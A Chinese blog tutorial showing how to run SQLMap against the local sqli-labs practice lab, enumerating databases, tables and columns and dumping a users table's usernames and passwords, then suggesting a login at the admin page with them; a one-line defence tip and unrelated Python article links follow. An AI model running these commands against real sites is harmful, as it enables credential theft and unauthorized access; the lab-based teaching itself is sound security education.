黑客技术——SQLMAP获取后台账号密码
moboyou 2025-03-31 15:26 46 浏览
BY 马丁
一. SQLmap
SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。
二. 常见注入类型
ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入
ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句是否已执行(页面返回时间的增加)来判断
ü 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
ü 联合查询注入,在可以使用Union的情况下的注入
ü 堆查询注入,可以使用多条执行语句时的注入
三. 所用环境及工具
ü Python 2.7.8
ü SQLMap 1.4
ü Sqlilabs
四. 步骤
1. 安装SQLMap需要安装python环境(不支持python3),实验中使用到的环境是python 2.7.8。安装好了过后如下图。
2. 把SQLMap安装包放入python的安装目录下面,进入到SQLMap的目录。
3. 判断目标URL是否存在注入点。检测出注入点,便进一步查询数据库。
4. 查询当前用户下的所有数据库名称 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
5. 查询当前使用的数据库 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db 获取当前数据库的名称
6. 进而查询当前数据中的表 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security –tables
7. 知道了表过后,就可以来查询表中的字段了 sqlmap.py -u "
http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users –columns
8. 查询出了字段过后,就可以来查寻表中的数据了,也就是账号密码。得到帐户密码过后,可以寻找后台地址来尝试登陆。
sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C password,username –dump
五. SQL注入的防御
对客户端提交的代码进行严格的转义和过滤。
- 上一篇:常见安全漏洞修复方法
- 下一篇:从运维的角度带你初识neo4j图形数据库的安装及配置
相关推荐
- Python网络爬虫之分析网页
-
一、分析并提取网页内容的有三种方式o正则表达式(速度最快,但适应变化略差)oBeautifulsoup库(速度是正则表达式的约几分之一)oselenium或pyppeteer的中的浏览器对象的查找元素...
- Python进阶-day9:正则表达式
-
目标学习Python的re模块基础用法。掌握正则表达式的匹配(match,search,findall)、替换(sub)和分割(split)操作。练习:编写代码从一段文本中提取所有邮箱地址。学习内...
- Python模块datetime、calendar、logging、argparse、re用法
-
datetime模块:提供日期和时间相关的功能。importdatetime#获取当前日期和时间current_time=datetime.datetime.now()#格式化日期...
- 一文讲清怎么利用Python实现Linux系统日志检索分析管理系统
-
摘要:在现代IT运营与开发中,日志分析早已成为不可或缺的核心环节。无论是排查系统故障、进行安全审计,还是优化服务性能,日志文件始终是最真实、最权威的信息来源。Linux系统作为主流的服务器操作系统,其...
- Python基础编程——标准库之shelve模块
-
在实际开发中,要将数据进行持久化,通常的做法是,将数据保存到文件或者数据库中。Python有多种方法将数据保存到文件中,本节将会介绍使用Python的标准库shelve来将数据保存到文件中。shelv...
- 使用 Python 开发一个 Python 解释器
-
原文地址:https://python.plainenglish.io/introduction-to-creating-interpreter-using-python-c2a9a6820aa0原文...
- 强烈推荐!Python 这个宝藏库 re 正则匹配
-
Python的re模块(RegularExpression正则表达式)提供各种正则表达式的匹配操作。在文本解析、复杂字符串分析和信息提取时是一个非常有用的工具,下面总结了re模块的常用方...
- python入门到脱坑正则表达式—re.match()函数
-
re.match()是Python正则表达式模块re中的一个重要方法,用于从字符串的起始位置匹配一个模式。下面我将详细介绍它的用法和特点。基本语法re.match(pattern,stri...
- Python中使用re模块实现正则表达式的替换字符串操作
-
#编程语言#我是"学海无涯自学不惜!",关注我,一同学习简单易懂的Python编程。0基础学python(83)Python中,导入re模块后还可以进行字符串的替换操作,就是sub()...
- 深入理解re模块:Python中的正则表达式神器解析
-
在Python中,"re"是一个强大的模块,用于处理正则表达式(regularexpressions)。正则表达式是一种强大的文本模式匹配工具,用于在字符串中查找、替换或提取特定模式...
- python入门到脱坑正则表达式—re.search()函数
-
re.search()是Python正则表达式模块re中的核心函数之一,用于在字符串中搜索匹配指定模式的第一个位置。与re.match()不同,它不限制匹配必须从字符串开头开始。基本语法...
- python入门到脱坑正则表达式—re.sub()函数
-
re.sub()是Python正则表达式模块re中用于字符串替换的核心函数,它可以在字符串中搜索匹配正则表达式的部分,并将其替换为指定的内容。基本语法re.sub(pattern,repl...
- python之re模块
-
re模块一.re模块的介绍1.什么是正则表达式"定义:正则表达式是一种对字符和特殊字符操作的一种逻辑公式,从特定的字符中,用正则表达字符来过滤的逻辑。(也是一种文本模式;)2、正则表达式可以...
- Python中re模块详解
-
在《用最简单的方式教会你使用Python正则》一文中,我们介绍了正则表达式该如何书写,还通过简单的示例介绍了Python中如何通过re模块使用正则功能。今天本文将通过以下内容详细介绍r...
- 微信积分商城货到付款系统|裂变营销+物流闭环
-
微信积分商城货到付款系统核心卖点速览零成本运营:免授权+完全开源PHP源码,9MB轻量部署,Mysql数据库高效支撑。灵活支付组合:独创“积分+货到付款+运费”混合支付,用户兑换无忧,商家资金零风险...
- 一周热门
- 最近发表
- 标签列表
-
- curseforge官网网址 (16)
- 外键约束 oracle (36)
- oracle的row number (32)
- 唯一索引 oracle (34)
- oracle in 表变量 (28)
- oracle导出dmp导出 (28)
- oracle 数据导出导入 (16)
- oracle两个表 (20)
- oracle 数据库 字符集 (20)
- oracle安装补丁 (19)
- matlab归一化 (16)
- matlab化简多项式 (20)
- 多线程的创建方式 (29)
- 多线程 python (30)
- java多线程并发处理 (32)
- 宏程序代码一览表 (35)
- c++需要学多久 (25)
- c语言编程小知识大全 (17)
- css class选择器用法 (25)
- css样式引入 (30)
- html5和css3新特性 (19)
- css教程文字移动 (33)
- php简单源码 (36)
- php个人中心源码 (25)
- 网站管理平台php源码 (19)